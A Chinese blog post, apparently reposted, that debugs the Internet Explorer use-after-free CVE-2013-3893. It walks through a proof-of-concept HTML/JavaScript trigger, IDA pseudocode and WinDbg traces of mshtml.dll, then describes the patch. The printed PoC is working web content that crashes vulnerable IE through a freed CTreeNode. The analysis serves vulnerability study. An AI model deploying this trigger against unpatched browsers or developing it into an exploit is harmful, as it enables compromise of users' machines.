IE漏洞调试之CVE-2013-3893

首页 > 代码库 > IE漏洞调试之CVE-2013-3893

2024-08-09 18:20:18 220人阅读

前言

Windows平台的漏洞挖掘和安全研究中，IE始终是绕不开的话题。IE漏洞就跟adobe系列一样经典，是学习exploit、shellcode的绝佳途径。

在IE漏洞中，UAF即Use-After-Free是最为经典的一类。UAF可以这样简单理解：A先后调用B、C、D三个子函数，B会把A的某个资源释放掉；而D由于判断不严谨即使在B把A的资源释放后依然去引用它，比如某个指针，这时D引用了很危险的悬空指针；C是个什么角色呢？我们可以通过B分配数据。所以利用方法来了：构造奇葩的数据，让A调用B，B把A的某个指针释放掉；接着执行C，C赶紧分配内存，企图使用刚才释放掉的内存，同时我们可以控制这个内存；最后D被调用，由于检查不严格调用了已经释放掉的某指针，而该指针实际上已经被我们重用并且扭曲。漏洞被利用。

但是学习IE的资料非常少，已知的大都是大牛们逆向mshtml.dll来的，辛辛苦苦得来的东西也不方便马上透露出来，所以自力更生是很重要的。我们希望了解IE运行机制，自己fuzz并找到有价值的漏洞。与此同时，能够调试已公布的漏洞，学习已有的POC，也是很重要的能力。所以这里选择CVE-2013-3893这个经典的UAF来学习IE漏洞的调试。

工具

windbg、ida、各版本IE程序、xp/vista/win7/win8虚拟机

windbg用于动态调试；IDA用于静态分析mshtml.dll——实现IE解释器的dll；各版本IE和windows是必不可少的。

基础知识

出现一个新的漏洞，涉及到的解析过程我们并不一定分析过，所以分析漏洞的同时也是学习浏览器机制的好机会。比如CVE-2013-3893这个漏洞，我们需要了解CTreeNode和元素的关系以及几个关键的函数实现。具体的结合POC和调试过程分析。

POC

<html><script>function trigger(){    Math.tan(3,4);    var id_0 = document.createElement("sup");    var id_1 = document.createElement("audio");    Math.sin(0);    document.body.appendChild(id_0);    document.body.appendChild(id_1);    Math.cos(0);    id_1.applyElement(id_0);    Math.tan(3,4);    id_0.onlosecapture=function(e){        document.write("");    }    Math.sin(0);     id_0[‘outerText’]="";    Math.cos(0);    id_0.setCapture();    Math.tan(3,4);    id_1.setCapture();    Math.sin(0);}window.onload = function() {    trigger();}</script></html>

调试技巧

用windbg载入IE时设置jscript!tan、jscript!sin、jscript!cos断点，逐语句分析。也可以将POC页面设置为IE主页，便于直接载入。结合IDA对mshtml.dll分析相关函数。

漏洞原理

id_1.setCapture时，进入CDoc::PumpMessage；获取Element的TreeNode，调用CDoc::ReleaseDetachedCaptures()；参数为0调用CDos::SetMouseCapture，进入CDos::ClearMouseCapture，调用CElement::FireEvent，触发事件导致id_0.onlosecapture指定的js函数调用，document.write(“”)，该函数将所有对象释放CBodyElement的CTreeNode也被释放。然后返回PumpMessage，CDos::HasContainerCapture被调用，它引用了释放的CTreeNode对象。UAF发生。看下面IDA静态分析的代码。

int __userpurge CDoc::SetMouseCapture<eax>(int a1<eax>, LPVOID lpMem, int a3, int a4, int a5, int a6, int a7){  int v7; // ebx@1  int flag; // edi@1  int result; // eax@3  int v10; // esi@9  int v11; // ecx@16  int v12; // eax@22  int v13; // ST14_4@28  char v14; // [sp+10h] [bp-98h]@21  int v15; // [sp+14h] [bp-94h]@21  int v16; // [sp+A4h] [bp-4h]@5  void *lpMema; // [sp+B0h] [bp+8h]@7   v7 = (int)lpMem;  flag = a1;  if ( *((_WORD *)lpMem + 938) & 0x1000 )    flag = 0;  if ( flag )  {    v16 = (*((_DWORD *)lpMem + 65) >> 2) - 1;    result = v16;    if ( v16 < 0 )      goto LABEL_33;    v11 = *((_DWORD *)lpMem + 67) + 4 * v16;    do    {      if ( *(_DWORD *)(*(_DWORD *)v11 + 8) == flag )        break;      --result;      v11 -= 4;    }    while ( result >= 0 );    if ( result < 0 )    {LABEL_33:      result = ATL_malloc(0x10u);      if ( result )      {        result = CElementCapture::CElementCapture(result, a6, a7, a3, a4);        lpMema = (void *)result;      }      else      {        lpMema = 0;      }      if ( lpMema )      {        v10 = CDoc::GetLastCapture(v7);        if ( v10 && CDoc::HasContainerCapture(v7) )        {          CMessage::CMessage(&v14, 0);          v15 = 533;          CDoc::PumpMessage(v7, (int)&v14, 0, 0);          if ( v10 == CDoc::GetLastCapture(v7) )          {            v12 = *(_DWORD *)(v10 + 12);            if ( !(v12 & 2) )            {              if ( !(*(_DWORD *)(*(_DWORD *)(v10 + 8) + 28) & 0x8000000) )              {                *(_DWORD *)(v10 + 12) = v12 | 2;                *(_DWORD *)(v7 + 1876) |= 0x1000u;                CElement::FireEvent(&s_propdescCElementonlosecapture, 1, 0, -1, 0, 0);                *(_DWORD *)(v7 + 1876) &= 0xFFFFEFFFu;              }            }          }          if ( *(_DWORD *)(v7 + 260) & 0xFFFFFFFC )          {            if ( v10 == CDoc::GetLastCapture(v7) )            {              CElementCapture::_CElementCapture();              CBlockElement::operator delete((LPVOID)v10);              CImplPtrAry::Delete(v13, v7 + 256);            }            CImplPtrAry::Append();          }          else          {            CElementCapture::_CElementCapture();            CBlockElement::operator delete(lpMema);          }          result = CMessage::_CMessage();        }        else        {          result = CImplPtrAry::Append();          if ( !v10 )            result = CServer::SetCapture(1);        }      }    }  }  else  {    result = CDoc::ClearMouseCapture(lpMem, 0);  }  return result;}

调试过程

0:008> bl 1 e 633b87ca     0001 (0001)  0:**** jscript!sin 2 e 633b5cea     0001 (0001)  0:**** jscript!tan 3 e 633b8820     0001 (0001)  0:**** jscript!Cos

三个断点下好。根据POC的执行流程来。首先是createElement，我们在CDocument::createElement下断，获取ld_0和ld_1的element对象地址。

技术分享

ld_0 element对象地址为 0020aad8。同时可以看到createElement的调用栈。在同一位置下断，获取ld_1的对象地址。

0:008> bp eip

技术分享

Ld_1对象地址为 0021cee8。

下面的语句：document.body.appendChild(id_0);document.body.appendChild(id_1); 在CElement::appendChild下断。获取element对应的CTreeNode对象。该函数最后调用 mshtml!CMarkup::InsertElementInternal完成操作，在InsertElementInternal内部调用CTreeNode构造函数。

技术分享

ld_0 对应的 CTreeNode对象地址为 03291fc8。

技术分享

ld_1对应的 CTreeNode对象地址为03292020。

同时可以发现 CTreeNode->CElement。Element偏移为0。

0:008> dc 0021cee80021cee8  635db4c8 00000002 00000008 02d14e20  ..]c........ N..0021cef8  003bd060 03292020 00000075 00010200  `.;.  ).u.......

Element偏移0×14为其对应的CTreeNode结构。

id_1.applyElement(id_0);语句和appendChild执行过程差不多，我猜测appendChild是将两个元素插入DOM树，而applyElement是将id0和id1的CTreeNode对象变成父子关系。

技术分享

看看ld0和ld1的对象和CTreeNode对象发生了什么变化：

之前：

Ld0 ctreenode0:008> dc 03291fc8 l803291fc8  0020aad8 00203f10 ffff0060 ffffffff  .. ..? .`.......03291fd8  00000000 00000000 00000000 00000000  ................ Ld1 ctreenode0:008> dc 0329202003292020  0021cee8 00203f10 ffff0275 ffffffff  ..!..? .u.......03292030  00000061 00000000 02da6fe0 02ccd4f8  a........o......

完成这个操作之后：

Ld0 ctreenode0:008> dc 03291fc8 l803291fc8  0020aad8 00203f10 00020260 00030001  .. ..? .`.......03291fd8  00000061 00000000 03292048 02da6ec8  a.......H )..n.. Ld1 ctreenode0:008> dc 03292020 l803292020  0021cee8 03291fc8 00020275 00000001  ..!...).u.......03292030  00000051 00000000 00000000 03291ff0  Q.............).

一个疑似链表结构出现。DOM对象也是链接起来的。也说明00203f10是CBodyElement对应的CTreeNode。

0:008> dc 00203f10 l800203f10  02da6680 00203e60 00016210 00010000  .f..`> ..b......00203f20  00000551 00000008 00203e18 03291fd8  Q........> ...).

接下来是一个设置，ld0的onlosecapture失去聚焦时执行的函数，页面清空。然后id_0[‘outerText‘]="";，js不太熟悉，这个操作执行之后id0应该会从DOM树脱离下来。Id1作为儿子也会脱离DOM树。应该是这样。

技术分享

Ld1先被release。然后是ld0。

技术分享

此时再看ctreenode地址：

0:008> dc 3291fc8 l803291fc8  0020002e 00000000 ffff0060 ffffffff  .. .....`.......03291fd8  00000051 00000000 00000000 00000000  Q............... 0:008> dc 0329202003292020  00210039 00000000 ffff0075 ffffffff  9.!.....u.......03292030  00000051 00000000 00000000 00000000  Q...............

已经被释放了。

然后进入重点SetMouseCapture。Eax = 20aad8。

mshtml!CDoc::SetMouseCapture:635ddca3 8bff            mov     edi,edi635ddca5 55              push    ebp635ddca6 8bec            mov     ebp,esp635ddca8 81ec9c000000    sub     esp,9Ch635ddcae 53              push    ebx635ddcaf 8b5d08          mov     ebx,dword ptr [ebp+8]635ddcb2 66f783540700000010 test  word ptr [ebx+754h],1000h635ddcbb 56              push    esi635ddcbc 57              push    edi635ddcbd 8bf8            mov     edi,eax635ddcbf 0f8566f62100    jne     mshtml!CDoc::SetMouseCapture+0x1e (637fd32b)635ddcc5 33f6            xor     esi,esi635ddcc7 3bfe            cmp     edi,esi635ddcc9 0f857d860d00    jne     mshtml!CDoc::SetMouseCapture+0x32 (636b634c) [br=1]会跳转：636b634c 8b8304010000    mov     eax,dword ptr [ebx+104h]636b6352 c1e802          shr     eax,2636b6355 48              dec     eax636b6356 3bc6            cmp     eax,esi636b6358 8945fc          mov     dword ptr [ebp-4],eax636b635b 0f8dd16f1400    jge     mshtml!CDoc::SetMouseCapture+0x43 (637fd332)636b6361 6a10            push    10h636b6363 e85dd0f7ff      call    mshtml!operator new (636333c5)636b6368 3bc6            cmp     eax,esi636b636a 59              pop     ecx636b636b 7466            je      mshtml!CDoc::SetMouseCapture+0x8b (636b63d3)636b636d ff7510          push    dword ptr [ebp+10h]636b6370 8b4d14          mov     ecx,dword ptr [ebp+14h]636b6373 ff750c          push    dword ptr [ebp+0Ch]636b6376 8bd7            mov     edx,edi636b6378 ff751c          push    dword ptr [ebp+1Ch]636b637b ff7518          push    dword ptr [ebp+18h]636b637e 50              push    eax636b637f e859000000      call    mshtml!CElementCapture::CElementCapture (636b63dd)636b6384 894508          mov     dword ptr [ebp+8],eax636b6387 397508          cmp     dword ptr [ebp+8],esi636b638a 0f844679f2ff    je      mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)636b6390 8bcb            mov     ecx,ebx636b6390 8bcb            mov     ecx,ebx636b6392 e8f6e0f3ff      call    mshtml!CDoc::GetLastCapture (635f448d)636b6397 8bf0            mov     esi,eax636b6399 85f6            test    esi,esi636b639b 897510          mov     dword ptr [ebp+10h],esi636b639e 0f85b06f1400    jne     mshtml!CDoc::SetMouseCapture+0xab (637fd354)636b63a4 8b7d08          mov     edi,dword ptr [ebp+8]636b63a7 8db300010000    lea     esi,[ebx+100h]636b63ad e88456f8ff      call    mshtml!CImplPtrAry::Append (6363ba36)636b63b2 837d1000        cmp     dword ptr [ebp+10h],0636b63b6 0f851a79f2ff    jne     mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)636b63bc 6a01            push    1636b63be 8bf3            mov     esi,ebx636b63c0 e880d9ffff      call    mshtml!CServer::SetCapture (636b3d45)636b63c5 e90c79f2ff      jmp     mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)

相当于走了如下流程：

if ( v10 && CDoc::HasContainerCapture(v7) ) {}Else {result = CImplPtrAry::Append();if ( !v10 )result = CServer::SetCapture(1);}

当id1执行SetMouseCapture时，情况就不一样了，这是GetLastCapture不为空。执行如下流程：

CDoc::PumpMessage(v7, (int)&v14, 0, 0); 636b639e 0f85b06f1400    jne     mshtml!CDoc::SetMouseCapture+0xab (637fd354) [br=1]......637fd354 8b7f14          mov     edi,dword ptr [edi+14h] ds:0023:0021cefc=00000000637fd357 8bcb            mov     ecx,ebx637fd359 e80271dfff      call    mshtml!CDoc::HasContainerCapture (635f4460)637fd35e 85c0            test    eax,eax637fd360 0f843e90ebff    je      mshtml!CDoc::SetMouseCapture+0x191 (636b63a4)637fd366 33ff            xor     edi,edi637fd368 57              push    edi637fd369 8d8568ffffff    lea     eax,[ebp-98h]637fd36f 50              push    eax637fd370 e8bdc3efff      call    mshtml!CMessage::CMessage (636f9732)637fd375 57              push    edi637fd376 57              push    edi637fd377 8d8568ffffff    lea     eax,[ebp-98h]637fd37d 50              push    eax637fd37e 8bcb            mov     ecx,ebx637fd380 c7856cffffff15020000 mov dword ptr [ebp-94h],215h637fd38a e8386adfff      call    mshtml!CDoc::PumpMessage (635f3dc7)637fd38f 8bcb            mov     ecx,ebx

进入PumpMessage函数。有点类似win32的消息处理。跟一下会走到什么地方。

敏感调用：

635f3f68 8b4014          mov     eax,dword ptr [eax+14h]635f3f6b 89442410        mov     dword ptr [esp+10h],eax635f3f84 57              push    edi635f3f85 e815feffff      call    mshtml!CDoc::ReleaseDetachedCaptures (635f3d9f)

0:008> r eaxeax=00203f10

发现eax正是CBodyElement对应的CTreeNode。

函数内部接着跟，发现这个：

637fd484 52              push    edx637fd485 33c9            xor     ecx,ecx637fd487 51              push    ecx637fd488 52              push    edx637fd489 52              push    edx637fd48a 6a01            push    1637fd48c 50              push    eax637fd48d 33c0            xor     eax,eax637fd48f e80f08deff      call    mshtml!CDoc::SetMouseCapture (635ddca3)

寄存器值：

0:008> reax=00000000 ebx=00000001 ecx=00000000 edx=00000000 esi=0020aad8 edi=00195de8

又一次调用SetMouseCapture，这时eax = 0，走的流程我们可以跟一下：

mshtml!CDoc::SetMouseCapture:635ddca3 8bff            mov     edi,edi635ddca5 55              push    ebp635ddca6 8bec            mov     ebp,esp635ddca8 81ec9c000000    sub     esp,9Ch635ddcae 53              push    ebx635ddcaf 8b5d08          mov     ebx,dword ptr [ebp+8]635ddcb2 66f783540700000010 test  word ptr [ebx+754h],1000h635ddcbb 56              push    esi635ddcbc 57              push    edi635ddcbd 8bf8            mov     edi,eax635ddcbf 0f8566f62100    jne     mshtml!CDoc::SetMouseCapture+0x1e (637fd32b)635ddcc5 33f6            xor     esi,esi635ddcc7 3bfe            cmp     edi,esi635ddcc9 0f857d860d00    jne     mshtml!CDoc::SetMouseCapture+0x32 (636b634c)635ddccf 56              push    esi635ddcd0 53              push    ebx635ddcd1 e817780400      call    mshtml!CDoc::ClearMouseCapture (636254ed)

调用ClearMouseCapture，注意此时ld1的SetCapture还没有完成，也就是说焦点依然在ld0。ClearMouseCapture显然会触发document.write那句话。按理说这句话应该把所有对象清除。但是我调试的过程中并没发生异常。继续跟一下。接着在PumpMessage中：

0:008> r ediedi=00203f100:008> r ecxecx=00195de8

0:008> dc edi00203f10  02da00b2 00000000 ffff6410 ffffffff  .........d......00203f20  00000571 00000008 00000000 00000000  q...............0:008> dc ecx00195de8  63633f18 00000014 000000a8 00000000  .?cc............00195df8  00000000 6363bcfc 00195de8 00178efc  ......cc.]......

635f587a 8b7c2410        mov     edi,dword ptr [esp+10h]635f587e 8b4c2414        mov     ecx,dword ptr [esp+14h]635f5882 e8d9ebffff      call    mshtml!CDoc::HasContainerCapture (635f4460)

确实CBodyElement对应的CTreeNode不太一样了。

跟进看看:

mshtml!CDoc::HasContainerCapture:635f4460 8bff            mov     edi,edi635f4462 55              push    ebp635f4463 8bec            mov     ebp,esp635f4465 51              push    ecx635f4466 56              push    esi635f4467 e821000000      call    mshtml!CDoc::GetLastCapture (635f448d)635f446c 8bf0            mov     esi,eax635f446e 33c0            xor     eax,eax635f4470 3bf8            cmp     edi,eax635f4472 0f8430210c00    je      mshtml!CDoc::HasContainerCapture+0x1b (636b65a8)635f4478 8b0f            mov     ecx,dword ptr [edi]  ds:0023:00203f10=02da00b2635f447a 894dfc          mov     dword ptr [ebp-4],ecx

这里出问题了应该。CBodyElement查找出现问题。

接着跟PumpMessage：

ecx=00203f10 edi=00203f10

635f3fd9 8bcf            mov     ecx,edi635f3fdb 897c241c        mov     dword ptr [esp+1Ch],edi635f3fdf e82eed0600      call    mshtml!CTreeNode::NodeAddRef (63662d12)

还是跟进看：

mshtml!CTreeNode::NodeAddRef:63662d12 8bff            mov     edi,edi63662d14 55              push    ebp63662d15 8bec            mov     ebp,esp63662d17 51              push    ecx63662d18 8365fc00        and     dword ptr [ebp-4],063662d1c e82cffffff      call    mshtml!CTreeNode::AddRef (63662c4d)63662d21 f6414002        test    byte ptr [ecx+40h],263662d25 0f855209f9ff    jne     mshtml!CTreeNode::NodeAddRef+0x26 (635f367d)63662d2b 8d45fc          lea     eax,[ebp-4]63662d2e 50              push    eax63662d2f 68e0976363      push    offset mshtml!IID_IUnknown (636397e0)63662d34 51              push    ecx63662d35 e807000000      call    mshtml!CTreeNode::GetInterface (63662d41)63662d3a c9              leave63662d3b c3              ret

代码非常简单跟进GetInterface看，找到了出问题的代码：

63662dbe 8b03            mov     eax,dword ptr [ebx]  ds:0023:00203f10=02da00b263662dc0 8b08            mov     ecx,dword ptr [eax]  ds:0023:02da00b2=0000000063662dca ff11            call    dword ptr [ecx]

找到问题了，就是之前把CTreeNode改掉了，导致CBodyElement对象寻址错误。典型的UAF漏洞。

IE对该漏洞进行补丁，将进入PumpMessage的判断条件修正了一下：如果对象已经不在DOM树上，将不进入PumpMessage。

补丁前：

技术分享

补丁后：

技术分享

IE漏洞调试之CVE-2013-3893

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们

首页 > 代码库 > IE漏洞调试之CVE-2013-3893

IE漏洞调试之CVE-2013-3893

看完仍有疑问？有类似问题直接问程序猿